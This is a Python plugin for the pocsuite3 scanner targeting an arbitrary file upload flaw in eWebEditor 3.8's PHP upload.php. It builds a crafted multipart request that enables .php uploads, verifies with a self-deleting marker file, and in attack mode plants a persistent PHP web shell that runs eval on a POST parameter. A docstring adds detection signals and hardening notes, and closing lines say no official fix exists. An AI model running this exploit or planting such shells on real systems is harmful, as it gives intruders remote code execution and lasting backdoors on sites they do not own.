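"""
pocsuite3 plugin: eWebEditor 3.8 /ewebeditor/php/upload.php file upload check.

If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
For more information, please visit http://pocsuite.org
"""

from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.lib.utils import random_str
from requests.exceptions import ReadTimeout
from urllib.parse import urljoin
import re


class DemoPOC(POCBase):
    """Check for the eWebEditor 3.8 (PHP edition) upload.php file upload issue.

    What the request does, as far as the payload on this page shows: the
    query string selects a style by name (``style=toby57``) and the multipart
    body carries its own definition of that style in a form field called
    ``aStyle[12]``.  That client-supplied definition appears to set the upload
    directory to ``../uploadfile/`` and to list ``php`` among the permitted
    extensions, after which a file named ``1.php`` is accepted.

    Notes for defenders and reviewers:

    * Log / WAF signal: a POST to ``ewebeditor/php/upload.php`` with
      ``action=save`` whose body contains a form field named ``aStyle[...]``.
      A success response contains ``parent.UploadSaved('<path>','')``.
    * Host artefact: a new ``.php`` file in the editor's upload directory.
      The file written by ``_verify`` removes itself on its first request;
      the file written by ``_attack`` does not and stays until deleted.
    * The page lists no vendor fix.  Usual hardening for this class of issue
      (not taken from the page): restrict access to the editor's upload
      endpoint and disable script execution in the upload directory.
    """

    vulID = '1020'  # ssvid
    version = '1'
    author = ['chenghs@knownsec.com']
    vulDate = '2011-08-01'
    createDate = '2013-07-29'
    updateDate = '2013-07-29'
    references = ['http://sebug.net/vuldb/ssvid-20860']
    # Title: "eWebEditor 3.8 /ewebeditor/php/upload.php file upload vulnerability POC"
    name = 'eWebEditor 3.8 /ewebeditor/php/upload.php 文件上传漏洞 POC'
    appPowerLink = 'http://www.ewebeditor.com/'
    appName = 'eWebEditor'
    appVersion = '3.8#'
    vulType = 'File Upload'
    # Description: "Because the style parameter is controllable, files in PHP
    # format can be added."
    desc = '''
    由于style参数可控,导致可以增加PHP格式文件。
    '''
    samples = []
    install_requires = ['']

    # Endpoint and query string, relative to the target base URL.
    _EWEB_UPLOAD_PATH = 'ewebeditor/php/upload.php?action=save&type=FILE&style=toby57&language=en'
    _EWEB_HEADERS = {'Content-Type': 'multipart/form-data; boundary=---------------------------19252181925439'}
    # Multipart delimiter line: "--" followed by the boundary declared above.
    _EWEB_DELIM = '-----------------------------19252181925439'
    # Fixed string the uploaded file prints; its presence in the response is
    # the only evidence used to call the target vulnerable.
    _EWEB_MARKER = '300d4af0950c89b847cf6f7500e6060c'
    # Raw string: the original non-raw pattern relied on invalid escape
    # sequences (``\.``, ``\(``), which newer Python versions warn about.
    _EWEB_SAVED_RE = re.compile(r"parent\.UploadSaved\('(.*?)',''\)")

    # Style definition sent in the aStyle[12] field.  Kept byte-for-byte as
    # published, including the four non-ASCII characters near the end; this is
    # runtime data, so do not normalise or re-encode it.
    _EWEB_STYLE = (
        'toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||'
        'rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||'
        '500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||'
        '1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||ËÎÌå||||||0|||jpg|jpeg|||'
        '300|||FFFFFF|||1'
    )

    # Everything in the form up to (and including) the blank line that precedes
    # the uploaded file's content.  Line breaks are reconstructed from the
    # multipart layout; the page shows this text collapsed onto one line.
    _EWEB_FORM_HEAD = '\n'.join([
        _EWEB_DELIM,
        'Content-Disposition: form-data; name="MAX_FILE_SIZE"',
        '',
        '512000',
        _EWEB_DELIM,
        'Content-Disposition: form-data; name="aStyle[12]"',
        '',
        _EWEB_STYLE + '\r\n',
        _EWEB_DELIM,
        'Content-Disposition: form-data; name="uploadfile"; filename="1.php"',
        'Content-Type: application/octet-stream',
        '',
        '',
    ])
    _EWEB_FORM_TAIL = '\n' + _EWEB_DELIM + '--\n'

    # Verification file: prints the marker, then unlinks itself.
    _EWEB_VERIFY_PHP = (
        "<?php echo '" + _EWEB_MARKER + "'; "
        '$url = $_SERVER["PHP_SELF"]; $filename = end(explode("/",$url));unlink($filename);?>'
    )
    # Attack-mode file: prints the marker and evaluates the POST parameter
    # ``a``.  It has no self-removal step.
    _EWEB_ATTACK_PHP = "<?php echo '" + _EWEB_MARKER + "'; eval($_POST[a]);?>"

    def _eweb_upload(self, php_source):
        """POST the form with *php_source* as the file content.

        Returns the absolute URL built from the path reported in the
        ``parent.UploadSaved(...)`` response, or ``None`` when the response
        contains no such call.
        """
        vul_url = urljoin(self.url, self._EWEB_UPLOAD_PATH)
        body = self._EWEB_FORM_HEAD + php_source + self._EWEB_FORM_TAIL
        resp = requests.post(vul_url, data=body, headers=dict(self._EWEB_HEADERS))
        saved = self._EWEB_SAVED_RE.search(resp.text)
        if saved is None:
            return None
        return urljoin(self.url, saved.group(1))

    def _eweb_marker_served(self, url):
        """Return True when *url* answers 200 and the body contains the marker."""
        response = requests.get(url)
        return response.status_code == 200 and self._EWEB_MARKER in response.text

    def _verify(self):
        """Upload the self-deleting marker file and report whether it executed.

        Always returns an ``Output``.  The original returned a bare ``None``
        when the upload response did not match, unlike every other path.
        """
        result = {}
        try:
            verify_url = self._eweb_upload(self._EWEB_VERIFY_PHP)
            if verify_url is not None and self._eweb_marker_served(verify_url):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = verify_url
        except Exception as e:
            # Network and parsing errors are logged and reported as a failed check.
            logger.error(str(e))
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap *result* in an ``Output``: success if non-empty, else failure."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self):
        """Upload the attack-mode file and report its URL and content.

        Unlike ``_verify``, the uploaded file does not delete itself, so a
        successful run leaves a ``.php`` file in the target's upload directory;
        ``ShellInfo`` records where it is.  Always returns an ``Output`` (the
        original returned ``None`` when the upload response did not match).
        """
        result = {}
        try:
            shell_url = self._eweb_upload(self._EWEB_ATTACK_PHP)
            if shell_url is not None and self._eweb_marker_served(shell_url):
                result['ShellInfo'] = {}
                result['ShellInfo']['URL'] = shell_url
                result['ShellInfo']['Content'] = self._EWEB_ATTACK_PHP
        except Exception as e:
            # Network and parsing errors are logged and reported as a failed check.
            logger.error(str(e))
        return self.parse_output(result)

    def _shell(self):
        """Shell mode is not implemented for this plugin."""
        pass


register_poc(DemoPOC)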
暂无官方解决方案
暂无防护方案